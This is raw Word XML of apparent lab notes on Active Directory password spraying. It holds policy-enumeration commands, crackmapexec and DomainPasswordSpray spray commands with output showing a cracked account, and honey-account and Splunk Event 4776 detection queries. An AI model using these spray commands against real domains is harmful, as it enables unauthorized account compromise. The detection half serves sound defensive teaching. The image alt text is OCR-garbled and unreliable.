            <wp:extent cx="821055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76E9FC5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981BAD6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0E958D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3030E2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743797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30AD0695" w:rsidR="30AD0695">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="30AD0695" w:rsidP="30AD0695" w:rsidRDefault="30AD0695" w14:paraId="328F4DE9" w14:textId="1AE4B8BE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53D2688B" w14:textId="7B75A2FB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25892773" w14:textId="69173C8E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4F2018E7" w14:textId="34285EF0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25FE93AF" w14:textId="69D7D016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3ACD4B72" w14:textId="7E990115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2E630794" w14:textId="6F20C829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5D1D9DE5" w14:textId="6F0D7924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68EBD5A8" w14:textId="486AC1C7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00000000" w:rsidRDefault="00D91F86" w14:paraId="0296942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Enumerate Domain Lockout and Passw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ord Policy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tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto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340"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="0E17D4A8" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="1724795982"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13009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D91F86" w14:paraId="65BE8D88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C:\Users\vagrant&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>net accounts</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="5A4893CB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Force user logoff how long after time expires?:       Never</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="2D5AA71E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Minimum password age (days):                          1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="09C9F19C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Maximum password age (days):                          42</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="23469AA2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Minimum password length:            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7</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="66A6EBBA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Length of password history maintained:                24</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="2CAE2539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  <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Lockout threshold:                                    5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="2FD6CFB4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Lockout duration (minutes):                           Never</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="5EEAF79E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Lockout observation window (minutes):                 30</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="772A5052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Computer r</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ole:                                        WORKSTATION</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="2D585785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The command completed successfully.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="31225B5D" w14:textId="77777777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C:\Users\vagrant&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="4345EAA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C47D64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AF4DBFB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6E1C365" wp14:editId="2E11EA9C">
            <wp:extent cx="8248650" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="C: accounts &#10;Force user logoff how lone after time &#10;Minimum password age (days): &#10;Maximum password age (days): &#10;Minimum password length: &#10;Length of password history maintained: &#10;Lockout threshold: &#10;Lockout duration (minutes): &#10;Lockout observation window (minutes): &#10;Computer role: &#10;The command completed successfully. &#10;expires? : &#10;Never &#10;1 &#10;42 &#10;7 &#10;24 &#10;5 &#10;Never &#10;30 &#10;WORKST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 accounts &#10;Force user logoff how lone after time &#10;Minimum password age (days): &#10;Maximum password age (days): &#10;Minimum password length: &#10;Length of password history maintained: &#10;Lockout threshold: &#10;Lockout duration (minutes): &#10;Lockout observation window (minutes): &#10;Computer role: &#10;The command completed successfully. &#10;expires? : &#10;Never &#10;1 &#10;42 &#10;7 &#10;24 &#10;5 &#10;Never &#10;30 &#10;WORKSTATIO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3EA7F2D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C1C06F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A43D19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~ Alternate mathods: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="46CBD5CF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4D6452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B27088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Powershell - RSAT module installed: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Get-ADDefaultDomainPasswordPolicy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37E574B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623240" wp14:editId="522E70FB">
            <wp:extent cx="6772275" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="7" name="Picture 7" descr="PS Get-ADDefauLtDomainPasswordPoLicy &#10;ComplexityEnab1ed &#10;DistinguishedName &#10;LockoutDuration &#10;LockoutObser &#10;LockoutThresh01d &#10;MaxPasswordAge &#10;minPasswordAge &#10;minPasswordLength &#10;objectCIass &#10;objectGuid &#10;Passwor dHistor yCount &#10;ReversibleEncryptionEnab1ed &#10;: True &#10;. DC-Windomain , DC-local &#10;: eono:ee &#10;• {dornainDNS} &#10;: bc4109b4-9124-41se-b35d-b1748d;e2185 &#10;: 24 &#10;. Fal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S Get-ADDefauLtDomainPasswordPoLicy &#10;ComplexityEnab1ed &#10;DistinguishedName &#10;LockoutDuration &#10;LockoutObser &#10;LockoutThresh01d &#10;MaxPasswordAge &#10;minPasswordAge &#10;minPasswordLength &#10;objectCIass &#10;objectGuid &#10;Passwor dHistor yCount &#10;ReversibleEncryptionEnab1ed &#10;: True &#10;. DC-Windomain , DC-local &#10;: eono:ee &#10;• {dornainDNS} &#10;: bc4109b4-9124-41se-b35d-b1748d;e2185 &#10;: 24 &#10;. Fals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40E799A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FFEB1D4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8F8C5C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Get password policy wth crackmapexec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crackmapexec smb &lt;target&gt; -u &lt;user&gt; -p &lt;pass&gt; --pass-pol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="3AC8C3E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3114A5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95EC7E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4269A0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7F05E48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 w:rsidRPr="30AD0695" w:rsidR="30AD0695">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Times New Roman" w:cs="Calibri"/>
          <w:color w:val="1E4E79"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="30AD0695" w:rsidP="30AD0695" w:rsidRDefault="30AD0695" w14:paraId="0FD5B6E7" w14:textId="3159B667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170A2AE8" w14:textId="73F9BB9F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76D84DB9" w14:textId="7B3FF41A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90F7011" w14:textId="5F86C4E1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1F41708B" w14:textId="7E9A8C76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544BE179" w14:textId="5E27AA03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C82EABC" w14:textId="510077EE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83E37D8" w14:textId="7A3EAE45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0274CEAA" w14:textId="0A89D419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3BE229AB" w14:textId="0B12F332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4353997" w14:textId="7CCF09A8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57CD1282" w14:textId="30B25D3D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B99E74C" w14:textId="300D64E4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3163B23" w14:textId="13ED24DE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9761837" w14:textId="7045765B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782CDC38" w14:textId="6A7724A0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AD016A1" w14:textId="095DB3AA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6D6D9DEA" w14:textId="4306CCF5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BAFECC4" w14:textId="1EEB67AD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1E8A82DA" w14:textId="45C2B2CC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1D8437E9" w14:textId="5A9A670F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70ED021B" w14:textId="69D55729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78B106D5" w14:textId="1F560EC5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613E659" w14:textId="1B66C043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00000000" w:rsidRDefault="00D91F86" w14:paraId="4B5DB22B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Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="6488F66F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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="7562DFD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Crackmapexec: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://github.com/byt3bl33d3r/CrackMapExec</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="6D32C51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FC049B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~ Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>crackmapexec and mp64 to generate passwords and spray them against SMB services on the network.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ED7DDA6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crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="5A5EF4A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7DDAD14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DomainPasswordSpray (Powershell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="5E458106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hyperlink w:history="1" r:id="rId17">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://github.com/dafthack/DomainPasswordSpray</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="2B73BC3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20764B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Using DomainPasswordSpray to spray a password against all users of a domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="40AE995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/!\ be careful with the account lockout !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53C890D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Invoke-DomainPasswordSpray -UserList users.txt -Domain domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-name -PasswordList passlist.txt -OutFile sprayed-creds.txt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E627C4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346B7B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~ Example of Password Spraying using DomainPasswordSpray.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="6B02AE2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0DF599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Create passwords.txt with passwords to spray as well as users.txt with list of users that were previously enumerated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="737BFC6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68E9E08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AB11BB5" wp14:editId="5780E4C4">
            <wp:extent cx="11249025" cy="512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0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5851961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CF89E1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#Note that the script pauses for durration of domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> password policy observation window (lockout interval). A patient attacker can leave this running and come back to it (days later).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8D5C419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D51045" wp14:editId="36DDCB1C">
            <wp:extent cx="11268075" cy="5105400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="microsoft Windows [Version 10.0.14393) &#10;c 2816 microsoft Cor oration. All ri hts reserved. &#10;* ] Pausing to avoid account lockout. &#10;Waiting for 30 minutes. 1778 seconds remaining &#10;Copyright (C) 2916 Microsoft Corporation. All rights reser ved. &#10;PS C &#10;. . \DomainPasswordSpray. psi &#10;PS Invoke-Dornainpasswordspray -UserList users .txt -Domain windomain .Loca1 &#10;prayed-creds .txt -Verbose &#10;* ] Using users.txt as userlist to spray with &#10;[ * ] Warning: Users Will not be checked for lockout threshold. &#10;-passwordList passwords .txt &#10;-OutFi1e s &#10;[ * ] WARNING - Be very careful not to Lock out accounts with the password list option! &#10;The domain password policy observation window is set to 3€ minutes . &#10;* ] Setting a 39 minute wait in between sprays. &#10;Confirm Password Spray &#10;re &#10;01 &#10;you sure you cedar-it to perform a password spray against 501 accounts? &#10;[N] No Help (default is &quot;Y&quot;): y &#10;Password spraying has begun with 2 passwords &#10;This might take a while depending on the total number of users &#10;Now trying password Spring2€211. against 501 users. Current time is 9:48 pm &#10;Writing successes to sprayed-creds . txt &#10;SUCCESS! user :æcces password:springa€lll &#10;of 591 users tes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crosoft Windows [Version 10.0.14393) &#10;c 2816 microsoft Cor oration. All ri hts reserved. &#10;* ] Pausing to avoid account lockout. &#10;Waiting for 30 minutes. 1778 seconds remaining &#10;Copyright (C) 2916 Microsoft Corporation. All rights reser ved. &#10;PS C &#10;. . \DomainPasswordSpray. psi &#10;PS Invoke-Dornainpasswordspray -UserList users .txt -Domain windomain .Loca1 &#10;prayed-creds .txt -Verbose &#10;* ] Using users.txt as userlist to spray with &#10;[ * ] Warning: Users Will not be checked for lockout threshold. &#10;-passwordList passwords .txt &#10;-OutFi1e s &#10;[ * ] WARNING - Be very careful not to Lock out accounts with the password list option! &#10;The domain password policy observation window is set to 3€ minutes . &#10;* ] Setting a 39 minute wait in between sprays. &#10;Confirm Password Spray &#10;re &#10;01 &#10;you sure you cedar-it to perform a password spray against 501 accounts? &#10;[N] No Help (default is &quot;Y&quot;): y &#10;Password spraying has begun with 2 passwords &#10;This might take a while depending on the total number of users &#10;Now trying password Spring2€211. against 501 users. Current time is 9:48 pm &#10;Writing successes to sprayed-creds . txt &#10;SUCCESS! user :æcces password:springa€lll &#10;of 591 users tested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8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3BD0FAED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B373C13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91F86" w14:paraId="710886E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F2C629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4CF6C3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4772B5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30AD0695" w:rsidR="30AD0695">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="30AD0695" w:rsidP="30AD0695" w:rsidRDefault="30AD0695" w14:paraId="09D191BC" w14:textId="6E361C6A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9995450" w14:textId="4379DCBA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28B07C6E" w14:textId="73825AA9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03E5C1C1" w14:textId="7BA828C5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5D157525" w14:textId="3FAF64AB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0032F53D" w14:textId="5AEB915F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12946C3E" w14:textId="42F8BF13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44BF7193" w14:textId="6D1DB4A9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0C91253D" w14:textId="359B9BE7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535BFE71" w14:textId="24A3A7AD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641F7785" w14:textId="7D367E2D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30AD0695" w:rsidP="30AD0695" w:rsidRDefault="30AD0695" w14:paraId="5A987EF6" w14:textId="0DF424ED">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Times New Roman" w:cs="Calibri"/>
          <w:color w:val="1E4E79"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="1AC736CD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Creating a honey account as detection method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Times New Roman" w:cs="Calibri"/>
          <w:color w:val="1E4E79"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Times New Roman" w:cs="Calibri"/>
          <w:color w:val="1E4E79"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="678E09F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This is a technique taught by SANS (SEC 504 "SEC504: Ha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cker Tools, Techniques, Exploits, and Incident Handling"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="4F2080F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This technique is also referenced by CISA, Microsoft and other industry leaders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="2CFFC3A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B02455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12B331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# Criteria for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>honey account(s) that we learned from enumerating domain accounts from a hacker perspective: The honey account must look like a real account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="01539F0C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>Must be active.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="000950DA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i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ideally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> be member of "Domain Admins" group to guarantee attention of attackers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(not a hard require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ment but more effective).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="006F653C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>Should have a 20+ character random generated password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="4C8B69F3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>Password set to never expire.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="1B6C7702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 xml:space="preserve">Must have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>been logged into at least once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reset last logon time from 1601/01/01 00:00:00.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="2B1E5760" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1260"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Must have login hours set to "None" (Login Denied). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="460ADAF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97DF398" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="54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FF6CFD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Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="1A90E2E5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C5B2CE" wp14:editId="3C698D89">
            <wp:extent cx="4914900" cy="662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435D38F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A5F4A66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8678E9F" wp14:editId="77D73908">
            <wp:extent cx="4886325" cy="6572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64B60FC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787641D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B3EEDB" wp14:editId="0FDF0048">
            <wp:extent cx="5972175" cy="3800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60186FD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486A97A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D206D28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0088E7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34D690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BC2310A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13E03922" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Times New Roman" w:cs="Calibri"/>
          <w:color w:val="1E4E79"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Times New Roman" w:cs="Calibri"/>
          <w:color w:val="1E4E79"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Detecting Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="1BFC816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0FE15A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# Honey Account "Tripwire" Events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E918673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EventID: 4776(S, F): The computer attempted to validate the credentials for an account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/e</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>n-us/windows/security/threat-protection/auditing/event-4776</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="5FDFE15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AD582B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index="wineventlog" host="dc.windomain.local" EventCode=4776 Logon_Account=secopsadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="5C05008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6F1DE2F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1A90E3" wp14:editId="0B35404A">
            <wp:extent cx="13468350" cy="8334375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13" name="Picture 13" descr="Search &#10;splunksenterprise &#10;sourcetype = WinEventLog &#10;Apps &#10;Datasets &#10;Administrator • &#10;Messages • &#10;Reports &#10;Alerts &#10;Dashboards &#10;Settings • &#10;O Job &#10;Activity &#10;Save As • &#10;Help &#10;Analytics &#10;Find &#10;Search &amp; Reporting &#10;New Search &#10;windomain. local &quot; EventCode=4776 Logon_Account=secopsadmin &#10;1 event (5/16/21 PM to 5/16/21 PM) No Event Sampling &#10;Create Table View &#10;Date time range • &#10;Close &#10;Events (1) &#10;Patterns &#10;Statistics &#10;— Zoom Out &#10;All Fields &#10;Visualization &#10;Zoom to Selection &#10;Verbose Mode • &#10;I minute per column &#10;Format Timeline • &#10;&lt; Hide Fields &#10;SELECTED FIELDS &#10;a host 1 &#10;a source 1 &#10;a sourcetype 1 &#10;INTERESTING FIELDS &#10;a action 1 &#10;a app 1 &#10;a Authentication _ Package 1 &#10;List &#10;/ Format &#10;Time &#10;5/16/21 &#10;PM &#10;a body 1 &#10;a category 1 &#10;a ComputerName 1 &#10;a dest 1 &#10;a dest_nt_host 1 &#10;a dvc 1 &#10;a dvc_nt_host 1 &#10;a Error_Code 1 &#10;a event_description 1 &#10;# event_id 1 &#10;# event_type 1 &#10;# EventCode 1 &#10;a eventtype 4 &#10;x Deselect &#10;20 Per Page • &#10;Event &#10;05/16/2021 PM &#10;LogName=Security &#10;ventCode=4776 &#10;E &#10;EventType=0 &#10;ComputerName=dc. wi ndomain. local &#10;SourceName=Microsoft Windows security auditing. &#10;Type=lnformation &#10;RecordNumber=144288 &#10;Keywords=Audit Failure &#10;TaskCategory=Credential Validation &#10;Opcode=lnfo &#10;Message=The computer attempted to validate the credentials for an account. &#10;Authentication Package: &#10;ogon Account: &#10;secopsadmin &#10;Source Workstation: &#10;Error Code: &#10;Collapse &#10;exceeeeea &#10;host = dc.windomain.local source &#10;WinEventLog:Secur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arch &#10;splunksenterprise &#10;sourcetype = WinEventLog &#10;Apps &#10;Datasets &#10;Administrator • &#10;Messages • &#10;Reports &#10;Alerts &#10;Dashboards &#10;Settings • &#10;O Job &#10;Activity &#10;Save As • &#10;Help &#10;Analytics &#10;Find &#10;Search &amp; Reporting &#10;New Search &#10;windomain. local &quot; EventCode=4776 Logon_Account=secopsadmin &#10;1 event (5/16/21 PM to 5/16/21 PM) No Event Sampling &#10;Create Table View &#10;Date time range • &#10;Close &#10;Events (1) &#10;Patterns &#10;Statistics &#10;— Zoom Out &#10;All Fields &#10;Visualization &#10;Zoom to Selection &#10;Verbose Mode • &#10;I minute per column &#10;Format Timeline • &#10;&lt; Hide Fields &#10;SELECTED FIELDS &#10;a host 1 &#10;a source 1 &#10;a sourcetype 1 &#10;INTERESTING FIELDS &#10;a action 1 &#10;a app 1 &#10;a Authentication _ Package 1 &#10;List &#10;/ Format &#10;Time &#10;5/16/21 &#10;PM &#10;a body 1 &#10;a category 1 &#10;a ComputerName 1 &#10;a dest 1 &#10;a dest_nt_host 1 &#10;a dvc 1 &#10;a dvc_nt_host 1 &#10;a Error_Code 1 &#10;a event_description 1 &#10;# event_id 1 &#10;# event_type 1 &#10;# EventCode 1 &#10;a eventtype 4 &#10;x Deselect &#10;20 Per Page • &#10;Event &#10;05/16/2021 PM &#10;LogName=Security &#10;ventCode=4776 &#10;E &#10;EventType=0 &#10;ComputerName=dc. wi ndomain. local &#10;SourceName=Microsoft Windows security auditing. &#10;Type=lnformation &#10;RecordNumber=144288 &#10;Keywords=Audit Failure &#10;TaskCategory=Credential Validation &#10;Opcode=lnfo &#10;Message=The computer attempted to validate the credentials for an account. &#10;Authentication Package: &#10;ogon Account: &#10;secopsadmin &#10;Source Workstation: &#10;Error Code: &#10;Collapse &#10;exceeeeea &#10;host = dc.windomain.local source &#10;WinEventLog:Security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47E5922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4D25D822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FE17FFF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Detecting Password Spray using distict count of target accounts per source workstation (or source IP) in specified interval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="48F825D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2D0788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index="wineventlog" host="dc.windomain.local" EventCod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">e=4776 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="42ACC19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| timechart span=30m dc(Logon_Account) as Distinct_Logon_Account by Source_Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="788A8827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75962E03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4F0190C" wp14:editId="59FDA3BF">
            <wp:extent cx="13554075" cy="4857750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
